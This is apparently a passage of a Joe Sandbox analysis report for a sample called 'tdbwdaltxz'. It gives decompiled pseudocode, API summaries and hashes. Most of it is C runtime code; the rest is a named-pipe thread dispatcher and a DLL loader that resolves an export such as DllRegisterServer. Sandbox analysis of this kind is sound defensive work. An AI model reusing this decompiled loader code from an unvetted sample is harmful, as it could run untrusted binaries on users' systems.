                        0x0106521e
                        0x01065224
                        0x01065224
                        0x0106522a
                        0x01065231
                        0x01065234
                        0x0106523a
                        0x0106523a
                        0x01065246
                        0x0106524f
                        0x01065251
                        0x0106525d
                        0x01065260
                        0x01065266
                        0x00000000
                        0x01065266
                        0x0106525d
                        0x0106526e

                        APIs
                        • DecodePointer.KERNEL32 ref: 01065170
                        • _free.LIBCMT ref: 01065189
                          • Part of subcall function 01064ED2: HeapFree.KERNEL32(00000000,00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 01064EE6
                          • Part of subcall function 01064ED2: GetLastError.KERNEL32(00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 01064EF8
                        • _free.LIBCMT ref: 0106519C
                        • _free.LIBCMT ref: 010651BA
                        • _free.LIBCMT ref: 010651CC
                        • _free.LIBCMT ref: 010651DD
                        • _free.LIBCMT ref: 010651E8
                        • _free.LIBCMT ref: 01065202
                        • EncodePointer.KERNEL32(00000000), ref: 01065209
                        • _free.LIBCMT ref: 0106521E
                        • _free.LIBCMT ref: 01065234
                        • InterlockedDecrement.KERNEL32 ref: 01065246
                        • _free.LIBCMT ref: 01065260
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                        • String ID:
                        • API String ID: 4264854383-0
                        • Opcode ID: 9a57716c163faac7c5c97df9cef4320d0680e7122a111deceeb5fe89bfb6dfae
                        • Instruction ID: 86a43876cb99d79e0f667269f0d71909e1f07fb5aa7627368c323dc7b2f63edb
                        • Opcode Fuzzy Hash: 9a57716c163faac7c5c97df9cef4320d0680e7122a111deceeb5fe89bfb6dfae
                        • Instruction Fuzzy Hash: 9B213075E09252DFD7316F18FC4459E3BE8AF287607144069F6C4A6248C7BE98638F54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061700 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 103fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 56%
                        			E01061700(long _a4) {
				struct _OVERLAPPED* _v8;
				void _v12;
				void _v28;
				short _v76;
				intOrPtr _t15;
				void* _t33;
				void* _t36;
				void* _t38;
				void* _t39;
				void* _t40;

				_t15 = E01062D5A(_a4, 0, 0xa);
				 *0x1080ea0 = _t15;
				if(_t15 != 0) {
					swprintf( &_v76, 0, L"\\\\.\\pipe\\msica_%x_%d", _t15, 0x20, _t39);
					_t40 = CreateFileW( &_v76, 0xc0000000, 0, 0, 3, 0, 0);
					if(_t40 != 0xffffffff) {
						__imp__CoInitializeEx(0, 0, _t36, _t33);
						if(ReadFile(_t40,  &_v28, 0x10,  &_a4, 0) != 0) {
							_t38 = _a4;
							while(_a4 == 0x10) {
								asm("movq xmm0, [ebp-0x18]");
								asm("movq [edi], xmm0");
								asm("movq xmm0, [ebp-0x10]");
								asm("movq [edi+0x8], xmm0");
								_v12 = CreateThread(0, 0, E01061820, _t38, 0, 0);
								_v8 = 0;
								if(WriteFile(_t40,  &_v12, 8,  &_a4, 0) != 0 && _a4 == 8 && ReadFile(_t40,  &_v28, 0x10,  &_a4, 0) != 0) {
									continue;
								}
								goto L10;
							}
						}
						L10:
						__imp__CoUninitialize();
						return GetLastError();
					} else {
						return GetLastError();
					}
				} else {
					return 1;
				}
			}













                        0x0106170d
                        0x01061715
                        0x0106171c
                        0x01061738
                        0x01061759
                        0x0106175e
                        0x01061773
                        0x01061790
                        0x01061792
                        0x01061795
                        0x0106179b
                        0x010617aa
                        0x010617ae
                        0x010617b7
                        0x010617c4
                        0x010617d2
                        0x010617e1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x010617e1
                        0x01061795
                        0x010617fc
                        0x010617fc
                        0x0106180e
                        0x01061760
                        0x0106176a
                        0x0106176a
                        0x0106171e
                        0x01061726
                        0x01061726

                        APIs
                        • swprintf.LIBCMT ref: 01061738
                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 01061753
                        • GetLastError.KERNEL32 ref: 01061760
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CreateErrorFileLastswprintf
                        • String ID: \\.\pipe\msica_%x_%d
                        • API String ID: 2902539988-2637677629
                        • Opcode ID: d0ad0177cf56318903f4617d89c6d60be817f8b308d985b93779646d7c250152
                        • Instruction ID: 015d86fb1fc28f1ea0c4df5d32db43eecdcf1bf46c17c40f16496d308c0dc946
                        • Opcode Fuzzy Hash: d0ad0177cf56318903f4617d89c6d60be817f8b308d985b93779646d7c250152
                        • Instruction Fuzzy Hash: 2031B471A40309BAEB319AA4DC46FEE7B7CEB44711F104122FB84EA0C0EBB5A555C7E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010665CF Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E010665CF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x107e0c0);
				E010668F0(__ebx, __edi, __esi);
				E01064D39(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x1081c60 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E01064F0A();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x1081c60 = _t81;
						 *0x1081c44 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x1081c60;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x1081c60 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x1081d7c;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -17308756
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E01066893();
							L2:
							_t86 = 1;
							L3:
							return E01066935(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x1081c44 < _t135) {
							_t138 = E01064F0A(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x1081c60[_t149] = _t138;
								 *0x1081c44 =  *0x1081c44 + _t141;
								while(_t138 <  &(0x1081c60[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x1081c44;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x1081c60[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E0106ADE0(_t155, 0x1080660, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E0106ADE0(_t155, 0x1080660, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}




























                        0x010665cf
                        0x010665d1
                        0x010665d6
                        0x010665dd
                        0x010665e3
                        0x010665e5
                        0x010665ee
                        0x0106660e
                        0x01066612
                        0x01066613
                        0x01066614
                        0x0106661b
                        0x0106661d
                        0x01066622
                        0x0106663b
                        0x01066640
                        0x01066646
                        0x0106664f
                        0x01066655
                        0x01066658
                        0x0106665b
                        0x01066664
                        0x01066667
                        0x0106666d
                        0x01066670
                        0x01066673
                        0x01066676
                        0x01066679
                        0x01066679
                        0x01066684
                        0x0106668f
                        0x010667be
                        0x010667be
                        0x010667be
                        0x010667c4
                        0x00000000
                        0x00000000
                        0x010667cf
                        0x010667d5
                        0x010667db
                        0x010667f0
                        0x010667f6
                        0x010667fd
                        0x01066802
                        0x01066804
                        0x010667f8
                        0x010667fa
                        0x010667fa
                        0x0106680e
                        0x01066813
                        0x0106685a
                        0x01066860
                        0x01066863
                        0x01066869
                        0x01066870
                        0x01066875
                        0x01066875
                        0x00000000
                        0x01066819
                        0x0106681a
                        0x01066822
                        0x00000000
                        0x00000000
                        0x01066824
                        0x01066826
                        0x0106682e
                        0x0106683b
                        0x01066846
                        0x0106684b
                        0x0106684f
                        0x01066855
                        0x00000000
                        0x01066855
                        0x01066841
                        0x01066843
                        0x01066843
                        0x00000000
                        0x01066843
                        0x01066834
                        0x00000000
                        0x01066834
                        0x010667e2
                        0x010667e8
                        0x0106687c
                        0x0106687c
                        0x00000000
                        0x0106687c
                        0x010667db
                        0x01066882
                        0x01066889
                        0x01066603
                        0x01066605
                        0x01066606
                        0x0106660b
                        0x0106660b
                        0x01066695
                        0x0106669a
                        0x00000000
                        0x00000000
                        0x010666a0
                        0x010666a2
                        0x010666a5
                        0x010666a8
                        0x010666ad
                        0x010666b7
                        0x010666b9
                        0x010666bb
                        0x010666bb
                        0x010666c0
                        0x010666c1
                        0x010666c4
                        0x010666d6
                        0x010666d8
                        0x010666dd
                        0x01066771
                        0x01066778
                        0x0106677e
                        0x0106678e
                        0x01066794
                        0x01066797
                        0x0106679a
                        0x0106679e
                        0x010667a4
                        0x010667a7
                        0x010667aa
                        0x010667ad
                        0x010667ad
                        0x010667b2
                        0x010667b3
                        0x010667b6
                        0x00000000
                        0x010667b6
                        0x010666e3
                        0x010666e9
                        0x00000000
                        0x010666e9
                        0x010666ec
                        0x010666ee
                        0x010666f1
                        0x010666f4
                        0x010666f7
                        0x010666ff
                        0x01066704
                        0x0106675e
                        0x0106675e
                        0x0106675f
                        0x01066765
                        0x01066766
                        0x01066769
                        0x0106676c
                        0x00000000
                        0x0106670b
                        0x0106670b
                        0x0106670f
                        0x00000000
                        0x00000000
                        0x01066713
                        0x01066723
                        0x01066730
                        0x01066737
                        0x0106673c
                        0x01066743
                        0x0106674b
                        0x0106674f
                        0x01066755
                        0x01066758
                        0x0106675b
                        0x0106675b
                        0x00000000
                        0x0106675b
                        0x01066716
                        0x0106671c
                        0x01066721
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01066721
                        0x01066704
                        0x00000000
                        0x010666f7
                        0x0106662f
                        0x01066637
                        0x00000000
                        0x01066637
                        0x010665fb
                        0x00000000

                        APIs
                        • __lock.LIBCMT ref: 010665DD
                          • Part of subcall function 01064D39: __mtinitlocknum.LIBCMT ref: 01064D4B
                          • Part of subcall function 01064D39: __amsg_exit.LIBCMT ref: 01064D57
                          • Part of subcall function 01064D39: EnterCriticalSection.KERNEL32(?,?,0106B376,0000000D,?,?,?,?,?,?,?,?,0107E188,00000008,0106B30F,00000000), ref: 01064D64
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 010665FB
                        • __calloc_crt.LIBCMT ref: 01066614
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0106662F
                        • GetStartupInfoW.KERNEL32(?,0107E0C0,00000064), ref: 01066684
                        • __calloc_crt.LIBCMT ref: 010666CF
                        • GetFileType.KERNEL32(00000001), ref: 01066716
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0106674F
                        • GetStdHandle.KERNEL32(-000000F6), ref: 01066808
                        • GetFileType.KERNEL32(00000000), ref: 0106681A
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(-01081C54,00000FA0), ref: 0106684F
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 301580142-0
                        • Opcode ID: 91088f4e5e3c71fdec2f7c17a813bf2cbe2e8b4719bf04680d8cde266205a0e2
                        • Instruction ID: d02c6f26573e3cf54219d590be0414b1c1634ef5372004761c7be1c46be34b2e
                        • Opcode Fuzzy Hash: 91088f4e5e3c71fdec2f7c17a813bf2cbe2e8b4719bf04680d8cde266205a0e2
                        • Instruction Fuzzy Hash: BB91B471D0534A8FDB24CF68D8905ADBBF8BF19324B2442ADD4E6A73D1D73A9802CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010612A0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 40libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E010612A0(WCHAR* _a4, CHAR* _a8, struct HINSTANCE__** _a12) {
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t5;
				int _t6;
				void* _t12;
				void* _t13;
				struct HINSTANCE__** _t14;
				void* _t15;

				_t5 = LoadLibraryExW(_a4, 0, 8);
				_t14 = _a12;
				 *_t14 = _t5;
				if(_t5 == 0) {
					_push(_t5);
					_push("Unable to load dll %s\n");
					_t11 = E01062E24() + 0x40;
					_push(E01062E24() + 0x40);
					_t5 = E01062F67(_t12, _t13, _t14, _t11);
					_t15 = _t15 + 0xc;
					ExitProcess(1);
				}
				_t6 = GetProcAddress(_t5, _a8);
				if(_t6 == 0) {
					_push(_a8);
					_push(0x107b314);
					_push("Dll %s does not implement function %s\n");
					_t8 = E01062E24() + 0x40;
					_push(E01062E24() + 0x40);
					E01062F67(_t12, _t13, _t14, _t8);
					_t6 = FreeLibrary( *_t14);
					ExitProcess(1);
				}
				return _t6;
			}











                        0x010612ab
                        0x010612b1
                        0x010612b4
                        0x010612b8
                        0x010612ba
                        0x010612bb
                        0x010612c5
                        0x010612c8
                        0x010612c9
                        0x010612ce
                        0x010612d3
                        0x010612d3
                        0x010612dd
                        0x010612e5
                        0x010612e7
                        0x010612ea
                        0x010612ef
                        0x010612f9
                        0x010612fc
                        0x010612fd
                        0x01061307
                        0x0106130f
                        0x0106130f
                        0x01061317

                        APIs
                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,0106102C,?,DllRegisterServer,?), ref: 010612AB
                        • _fprintf.LIBCMT ref: 010612C9
                        • ExitProcess.KERNEL32 ref: 010612D3
                        • GetProcAddress.KERNEL32(00000000,?), ref: 010612DD
                        • _fprintf.LIBCMT ref: 010612FD
                        • FreeLibrary.KERNEL32(?), ref: 01061307
                        • ExitProcess.KERNEL32 ref: 0106130F
                        Strings
                        • Unable to load dll %s, xrefs: 010612BB
                        • Dll %s does not implement function %s, xrefs: 010612EF
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ExitLibraryProcess_fprintf$AddressFreeLoadProc
                        • String ID: Dll %s does not implement function %s$Unable to load dll %s
                        • API String ID: 1970097361-2710538428
                        • Opcode ID: 21a25a2c916bac2505390016a9b12ea3b494277095e4b75908445cfbbdf8f036
                        • Instruction ID: eef788b28d1eff7ddc5ed73dfef5aabfd499977a017bbb5781ead36e0250d6b9
                        • Opcode Fuzzy Hash: 21a25a2c916bac2505390016a9b12ea3b494277095e4b75908445cfbbdf8f036
                        • Instruction Fuzzy Hash: 14F04472940305FBEB122FA69C09B893A5CEF10751F004414FAD5E9141EA7795504795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01075B9D Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E01075B9D(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E01072387(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01064748(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x107e528);
					E010668F0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E0106B2AD(_t80, _t82, __eflags);
						_v36 = _t88;
						E010702E6(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E01064F0A(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E01064D39(0xc);
							_v8 = 1;
							E010755D5(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E01075D12();
							_t66 = E01075ECD(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0107024B(_t83);
								_t43 = E010700F1(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E010796BD(_a8, 0x1080bd0);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x1081c2c = 1;
									}
								}
								E01064D39(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E01070362(_t25, _t83);
								E0107024B(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x1080e04 & 0x00000001;
									if(( *0x1080e04 & 0x00000001) == 0) {
										E01070362(0x1080d3c,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x1080d3c; // 0x1080d40
										_t32 = _t77 + 0x84; // 0x1080e30
										 *0x1080e28 =  *_t32;
										_t33 = _t77 + 0x90; // 0x107c400
										 *0x1080678 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x1080e00 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E01075D21();
							}
						}
						_v8 = 0xfffffffe;
						E01075D54(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E010647CC(__eflags))) = 0x16;
						E0106471D();
						_t45 = 0;
					}
					return E01066935(_t45);
				}
				L20:
			}

















                        0x01075b9d
                        0x01075ba0
                        0x01075ba3
                        0x01075ba4
                        0x01075ba9
                        0x01075bcd
                        0x01075bd0
                        0x01075bab
                        0x01075bab
                        0x01075bac
                        0x01075baf
                        0x01075baf
                        0x01075bba
                        0x01075bbf
                        0x01075bc4
                        0x00000000
                        0x00000000
                        0x01075bc6
                        0x01075bca
                        0x00000000
                        0x01075bcc
                        0x00000000
                        0x01075bcc
                        0x00000000
                        0x01075bca
                        0x01075bd1
                        0x01075bd2
                        0x01075bd3
                        0x01075bd4
                        0x01075bd5
                        0x01075bd6
                        0x01075bdb
                        0x01075bdc
                        0x01075bde
                        0x01075be3
                        0x01075be8
                        0x01075bea
                        0x01075bed
                        0x01075bf1
                        0x01075c0f
                        0x01075c11
                        0x01075c14
                        0x01075c19
                        0x01075c1d
                        0x01075c2e
                        0x01075c30
                        0x01075c33
                        0x01075c35
                        0x01075c3d
                        0x01075c43
                        0x01075c4e
                        0x01075c55
                        0x01075c59
                        0x01075c6d
                        0x01075c6f
                        0x01075c72
                        0x01075c74
                        0x01075d2d
                        0x01075d33
                        0x01075c7a
                        0x01075c7a
                        0x01075c7e
                        0x01075c88
                        0x01075c8f
                        0x01075c91
                        0x01075c93
                        0x01075c93
                        0x01075c91
                        0x01075c9f
                        0x01075ca5
                        0x01075cac
                        0x01075cb1
                        0x01075cb7
                        0x01075cbf
                        0x01075cc3
                        0x01075cc5
                        0x01075ccc
                        0x01075cd6
                        0x01075cdd
                        0x01075ce3
                        0x01075ce9
                        0x01075cee
                        0x01075cf4
                        0x01075cf9
                        0x01075cfc
                        0x01075cfc
                        0x01075ccc
                        0x01075d01
                        0x01075d05
                        0x01075d05
                        0x01075c74
                        0x01075d3a
                        0x01075d41
                        0x01075d46
                        0x01075bf3
                        0x01075bf8
                        0x01075bfe
                        0x01075c03
                        0x01075c03
                        0x01075d4d
                        0x01075d4d
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                        • String ID:
                        • API String ID: 790675137-0
                        • Opcode ID: f5afad9bbba9115668c032d2a93cd3fb34ab3c3b2ecf79689cbf704c044a23d7
                        • Instruction ID: 44c9edf2cae7b300ca5cc1bfbfcae5c5fbaa916b790161151fbfcaac399cd8b0
                        • Opcode Fuzzy Hash: f5afad9bbba9115668c032d2a93cd3fb34ab3c3b2ecf79689cbf704c044a23d7
                        • Instruction Fuzzy Hash: DB410272D0430AAFDB20BFA8DC84BDD37E4BF14314F108569F9C896180DB7699028B59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010727FD Relevance: 13.6, APIs: 9, Instructions: 66COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E010727FD(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E01066594(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E01070E34(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x1081c60;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E01070E34(2);
							if(E01070E34(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E01070E34(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E01070DAE(_t35);
					 *((char*)( *((intOrPtr*)(0x1081c60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E010647AB(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                        0x01072800
                        0x01072807
                        0x01072810
                        0x0107281d
                        0x0107286f
                        0x0107286f
                        0x0107281f
                        0x0107281f
                        0x01072827
                        0x01072835
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0107283d
                        0x0107283d
                        0x0107283f
                        0x01072851
                        0x00000000
